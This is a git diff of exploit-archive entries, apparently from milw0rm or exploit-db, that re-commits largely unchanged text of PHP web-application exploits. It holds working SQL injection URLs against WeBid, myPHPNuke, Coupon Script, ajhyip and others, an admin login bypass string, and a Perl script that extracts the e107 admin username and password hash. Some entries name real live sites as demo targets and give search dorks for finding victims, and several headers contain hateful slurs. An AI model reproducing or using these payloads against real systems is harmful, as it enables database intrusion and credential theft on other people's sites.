-# milw0rm.com [2008-08-31] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+ ================================ + ========================== + ==================== +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + + +Application :: WeBid v0.5.4 Multi Exploit + +Found By :: Fisher762 [ SQ7@w.cn ] + + Groups : InjEctOr5 + + + +Download :: http://www.sourceforge.net/projects/simpleauction + +Dork 1 :: :P + +###########################[[[[EXPL0!T]]]]]################################# + + +[Bybpass] + + + + +Go to admin pannel + + +http://[Targ3t]/[webid]/admin/ + + + + +username= ' or 1=1/* + +password= ass u like :) + + +__________________________________________________________________________ + + +[ edit index css ] + + + +u can edit style css file [style.css] + + +http://[Targ3t]/webid/eledicss.php?nid=0&cd=themes/default&file=style.css + + +eX: http://www.fondoempleados.com/eledicss.php?nid=0&cd=themes/default&file=style.css + + + +__________________________________________________________________________ + + +[ view all Site SQL quires] + + + + +u can see all SQL quires + + + +http://[Targ3t]/webid/logs/cron.log + + +eX: http://www.hardlyeverwornit.com//logs/cron.log + + +###########################[[[[Th3 End]]]]]################################# + +# milw0rm.com [2008-08-31] diff --git a/platforms/php/webapps/6341.txt b/platforms/php/webapps/6341.txt index 55aeffd07..49501397c 100755 --- a/platforms/php/webapps/6341.txt +++ b/platforms/php/webapps/6341.txt 
@@ -1,6 +1,6 @@
-Application :: WeBid v0.5.4 sql injection vuln
-Download :: http://www.sourceforge.net/projects/simpleauction
-Found By ::Stack
-http://www.site.il/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
-
-# milw0rm.com [2008-09-01]
+Application :: WeBid v0.5.4 sql injection vuln
+Download :: http://www.sourceforge.net/projects/simpleauction
+Found By ::Stack
+http://www.site.il/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6342.txt b/platforms/php/webapps/6342.txt
index 60e27d10c..1f473a6fe 100755
--- a/platforms/php/webapps/6342.txt
+++ b/platforms/php/webapps/6342.txt
@@ -1,20 +1,20 @@
-##############EasyClassifields v3.0 SQL Injection#######################
-
-####By: e.wiZz!
-####Info: Bosnian Idiot FTW!
-####Site: infected.blogger.ba
-####Greetz: Luigi,suN8Hclf,str0ke
-In the wild...
-
-##################################################################
-
-###Script Site: http://myiosoft.com/?1.6.0.0
-###Vulnerability:
-
-http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=
-
-PoC on demo site:
-
-http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
-
-# milw0rm.com [2008-09-01]
+##############EasyClassifields v3.0 SQL Injection#######################
+
+####By: e.wiZz!
+####Info: Bosnian Idiot FTW!
+####Site: infected.blogger.ba
+####Greetz: Luigi,suN8Hclf,str0ke
+In the wild...
+
+##################################################################
+
+###Script Site: http://myiosoft.com/?1.6.0.0
+###Vulnerability:
+
+http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=
+
+PoC on demo site:
+
+http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6343.txt b/platforms/php/webapps/6343.txt
index f61da88fc..ed6c28700 100755
--- a/platforms/php/webapps/6343.txt
+++ b/platforms/php/webapps/6343.txt
@@ -1,26 +1,26 @@
--------------------------------------------
-Script : CMSbright ..
-
-site : http://www.cmsbright.com/
-
-Author : BorN To K!LL
-
-Dork : powered by CMSbright © websens
--------------------------------------------
-
-Exploit :
-
-public/page.php?id_rub_page=[SQL]
-
-Example :
-
-public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
-
--------------------------------------------
-Greets :
-
-Dr.2 , General C , CcTero0liTi , GolD_M .. & all my friends ..
-
--------------------------------------------
-
-# milw0rm.com [2008-09-01]
+-------------------------------------------
+Script : CMSbright ..
+
+site : http://www.cmsbright.com/
+
+Author : BorN To K!LL
+
+Dork : powered by CMSbright © websens
+-------------------------------------------
+
+Exploit :
+
+public/page.php?id_rub_page=[SQL]
+
+Example :
+
+public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
+
+-------------------------------------------
+Greets :
+
+Dr.2 , General C , CcTero0liTi , GolD_M .. & all my friends ..
+
+-------------------------------------------
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6346.pl b/platforms/php/webapps/6346.pl
index 7308b9bd9..e31adf10c 100755
--- a/platforms/php/webapps/6346.pl
+++ b/platforms/php/webapps/6346.pl
@@ -1,53 +1,53 @@
-#!/usr/bin/perl
-##############################################################
-# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
-# ..::virangar security team::.. #
-# www.virangar.net #
-# C0d3d BY:virangar security team ( hadihadi ) #
-#special tnx to: #
-#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
-#& all virangar members & all hackerz #
-# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
-# ..:::Young Iranina Hackerz::.. #
-##############################################################
-
-
-use HTTP::Request;
-use LWP::UserAgent;
-
-if (@ARGV != 1){
-header();
-}
-$site = $ARGV[0];
-
-$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_
-id=1/*";
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-$req = $b->request(HTTP::Request->new(GET=>$attack));
-$res = $req->content;
-
-if ($res =~ /(.*?)/){
- print "\n[+] Admin User : $1";}
-if ($res =~/([0-9a-fA-F]{32})/){
-print "\n[+] Admin Hash : $1\n\n";
-print "\n[+]Done\n";}
-
-sub header {
-print qq{
-###################################################################
-# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
-# www.virangar.net #
-# Useage: perl $0 Host #
-# #
-# Host: full patch to macgurublog.php (dont forget http://) #
-# #
-# Example: #
-# perl $0 http://site/macgurublog_menu/macgurublog.php #
-# #
-###################################################################
-};
-}
-#virangar.net[2008-05-22]
-
-# milw0rm.com [2008-09-01]
+#!/usr/bin/perl
+##############################################################
+# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
+# ..::virangar security team::.. #
+# www.virangar.net #
+# C0d3d BY:virangar security team ( hadihadi ) #
+#special tnx to: #
+#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
+#& all virangar members & all hackerz #
+# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
+# ..:::Young Iranina Hackerz::.. #
+##############################################################
+
+
+use HTTP::Request;
+use LWP::UserAgent;
+
+if (@ARGV != 1){
+header();
+}
+$site = $ARGV[0];
+
+$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_
+id=1/*";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$req = $b->request(HTTP::Request->new(GET=>$attack));
+$res = $req->content;
+
+if ($res =~ /(.*?)/){
+ print "\n[+] Admin User : $1";}
+if ($res =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n\n";
+print "\n[+]Done\n";}
+
+sub header {
+print qq{
+###################################################################
+# e107 Plugin BLOG Engine v2.2 SQL Injection Exploit #
+# www.virangar.net #
+# Useage: perl $0 Host #
+# #
+# Host: full patch to macgurublog.php (dont forget http://) #
+# #
+# Example: #
+# perl $0 http://site/macgurublog_menu/macgurublog.php #
+# #
+###################################################################
+};
+}
+#virangar.net[2008-05-22]
+
+# milw0rm.com [2008-09-01]
diff --git a/platforms/php/webapps/6347.txt b/platforms/php/webapps/6347.txt
index f90203152..9b51d9442 100755
--- a/platforms/php/webapps/6347.txt
+++ b/platforms/php/webapps/6347.txt
@@ -1,25 +1,25 @@
-############################################################
-
-SQL Injection vulnerability in myPHPNuke
-
-By MustLive (http://websecurity.com.ua)
-
-Detailed information: http://websecurity.com.ua/2398/
-
-Description: There is SQL Injection vulnerability in printfeature.php in
-myPHPNuke.
-
-SQL Injection:
-
-http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
-
-With this query you will receive login and password (hash) of administrator.
-
-Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
-additional filters were added, so it is not vulnerable to this attack. But
-version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
-Injection attack is possible (without using spaces and brackets).
-
-############################################################
-
-# milw0rm.com [2008-09-02]
+############################################################
+
+SQL Injection vulnerability in myPHPNuke
+
+By MustLive (http://websecurity.com.ua)
+
+Detailed information: http://websecurity.com.ua/2398/
+
+Description: There is SQL Injection vulnerability in printfeature.php in
+myPHPNuke.
+
+SQL Injection:
+
+http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1
+
+With this query you will receive login and password (hash) of administrator.
+
+Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
+additional filters were added, so it is not vulnerable to this attack. But
+version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
+Injection attack is possible (without using spaces and brackets).
+
+############################################################
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/6348.txt b/platforms/php/webapps/6348.txt
index ea5fa17fc..813b40f52 100755
--- a/platforms/php/webapps/6348.txt
+++ b/platforms/php/webapps/6348.txt 
@@ -1,57 +1,57 @@ -|___________________________________________________| -| -| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://www.couponscript.com/ -| -| DorK : inurl:couponsite/index.php?page= -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/* - - - - -L!VE DEMO: -_________ - - -http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/* - - - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe -| -| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-02] +|___________________________________________________| +| +| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script : http://www.couponscript.com/ +| +| DorK : inurl:couponsite/index.php?page= +|___________________________________________________| + 
+Exploit: +________ + + + +www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/* + + + + +L!VE DEMO: +_________ + + +http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/* + + + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe +| +| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-02] diff --git a/platforms/php/webapps/6349.txt b/platforms/php/webapps/6349.txt index ee57e8d63..dae358991 100755 --- a/platforms/php/webapps/6349.txt +++ b/platforms/php/webapps/6349.txt 
@@ -1,54 +1,54 @@ -|___________________________________________________| -| -| Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://www.sourceworkshop.com/reciprocal_links_manager.html -| -| DorK : "Powered by Reciprocal Links Manager" -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())-- - - - -L!VE DEMO: -_________ - - -http://reciprocal.fastidev.com/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())-- - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe -| -| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-02] +|___________________________________________________| +| +| Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script : http://www.sourceworkshop.com/reciprocal_links_manager.html +| +| DorK : "Powered by Reciprocal Links Manager" +|___________________________________________________| + +Exploit: +________ + + + 
+www.[target].com/Script/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())-- + + + +L!VE DEMO: +_________ + + +http://reciprocal.fastidev.com/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())-- + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe +| +| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-02] diff --git a/platforms/php/webapps/635.txt b/platforms/php/webapps/635.txt index 49f77ec5f..37c0ca9af 100755 --- a/platforms/php/webapps/635.txt +++ b/platforms/php/webapps/635.txt @@ -1,5 +1,5 @@ Example: - http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/* - -# milw0rm.com [2004-11-16] + http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/* + +# milw0rm.com [2004-11-16] diff --git a/platforms/php/webapps/6350.txt b/platforms/php/webapps/6350.txt index 396e9b63c..9554b87f0 100755 --- a/platforms/php/webapps/6350.txt +++ b/platforms/php/webapps/6350.txt 
@@ -1,51 +1,51 @@ -################################################################################################# -#################################### proud to be muslim ###################################### -### ### -### rEm0te sql injction VulnErability ### -### ### -### (ajhyip manager script) ### -### ### -################################################################################################# -################################################################################################# -### ### -### AuTh0r : security fears team ### -### ### -### Home : WwW.alsonaa.com ### -### ### -### members: HeB4RieH , germaya_x ### -### ### -################################################################################################# -################################################################################################# -### ### -### Script Name : ajhyip ### -### ### -### download : http://www.ajhyip.com/ ### -### ### -### Email : s-fteam@securityfears.cc ### -################################################################################################# -################################################################################################# -### ### -### d0rk :: "use your mind" ### -### (you can log to control panel from http://site.com login.php) ### -### ### -### -(:: sql Code ::)- ### -### comment.php?artid=(sql) ### -###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/* ### -### ### -################################################################################################# -### ### -### -(:: l!ve demo ::)- ### -### ### -###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* -### ### -###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* -######################## ##################### 
-######################## ##################### -################################################################################################# -################################################################################################# - -(:: !GreTzZ! ::)- - ::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs:: -################################################################################################# -################################################################################################# - -# milw0rm.com [2008-09-02] +################################################################################################# +#################################### proud to be muslim ###################################### +### ### +### rEm0te sql injction VulnErability ### +### ### +### (ajhyip manager script) ### +### ### +################################################################################################# +################################################################################################# +### ### +### AuTh0r : security fears team ### +### ### +### Home : WwW.alsonaa.com ### +### ### +### members: HeB4RieH , germaya_x ### +### ### +################################################################################################# +################################################################################################# +### ### +### Script Name : ajhyip ### +### ### +### download : http://www.ajhyip.com/ ### +### ### +### Email : s-fteam@securityfears.cc ### +################################################################################################# +################################################################################################# +### ### +### d0rk :: "use your mind" ### +### (you can log to control panel from http://site.com login.php) ### +### ### +### -(:: sql Code ::)- ### +### comment.php?artid=(sql) ### 
+###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/* ### +### ### +################################################################################################# +### ### +### -(:: l!ve demo ::)- ### +### ### +###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* +### ### +###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* +######################## ##################### +######################## ##################### +################################################################################################# +################################################################################################# + -(:: !GreTzZ! ::)- + ::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs:: +################################################################################################# +################################################################################################# + +# milw0rm.com [2008-09-02] diff --git a/platforms/php/webapps/6351.txt b/platforms/php/webapps/6351.txt index 5c8d5f546..8ec055e49 100755 --- a/platforms/php/webapps/6351.txt +++ b/platforms/php/webapps/6351.txt 
@@ -1,71 +1,71 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection ++++++++++++++ -======================================================= - - -<<->> script : aj-hyip - -<<->> script site : www.ajhyip.com/demo/meridian - : www.ajhyip.com/demo/acme - : www.ajhyip.com/demo/prime - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>>>>>>>> - - for admin inf0 ::: - - >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,admin_password),5,6,7,8+from+admin/* - - - for members inf0 ::: - - >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8+from+members/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker - anaconda-ksa $ sirus $ crazy-x $ br1ght-dark $ colden-zero - - -<<->> InjEctOr5 
TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal - - - -<<->> All muslims - -# milw0rm.com [2008-09-02] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection ++++++++++++++ +======================================================= + + +<<->> script : aj-hyip + +<<->> script site : www.ajhyip.com/demo/meridian + : www.ajhyip.com/demo/acme + : www.ajhyip.com/demo/prime + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>>>>>>>> + + for admin inf0 ::: + + >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,admin_password),5,6,7,8+from+admin/* + + + for members inf0 ::: + + >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8+from+members/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ 
+======================================================= + + +<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker + anaconda-ksa $ sirus $ crazy-x $ br1ght-dark $ colden-zero + + +<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal + + + +<<->> All muslims + +# milw0rm.com [2008-09-02] diff --git a/platforms/php/webapps/6354.txt b/platforms/php/webapps/6354.txt index ee19d757a..ef782565d 100755 --- a/platforms/php/webapps/6354.txt +++ b/platforms/php/webapps/6354.txt 
@@ -1,66 +1,66 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection ++++++++++++++ -======================================================= - - -<<->> script : Spice Classifieds - -<<->> script site : www.classifieds-scripts.com/spice - - - -======================================================= -++++++++++++++++ pWning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - >>>> www.site.me/patch/index.php?cat_path=-99999+union+select+0,user(),2,3/* - - - - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker - anaconda-ksa $ sirus $ crazy-x $ br1ght-dark $ colden-zero - - -<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal - - - -<<->> All muslims - -# milw0rm.com [2008-09-03] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection ++++++++++++++ +======================================================= + + +<<->> script : Spice Classifieds + +<<->> script site : www.classifieds-scripts.com/spice + + + +======================================================= +++++++++++++++++ pWning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + >>>> www.site.me/patch/index.php?cat_path=-99999+union+select+0,user(),2,3/* + + + + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker + anaconda-ksa $ sirus $ crazy-x $ br1ght-dark $ colden-zero + + +<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal + + + +<<->> All muslims + +# milw0rm.com [2008-09-03] diff --git a/platforms/php/webapps/6356.php b/platforms/php/webapps/6356.php index f0558817f..1d0991998 100755 --- a/platforms/php/webapps/6356.php +++ b/platforms/php/webapps/6356.php 
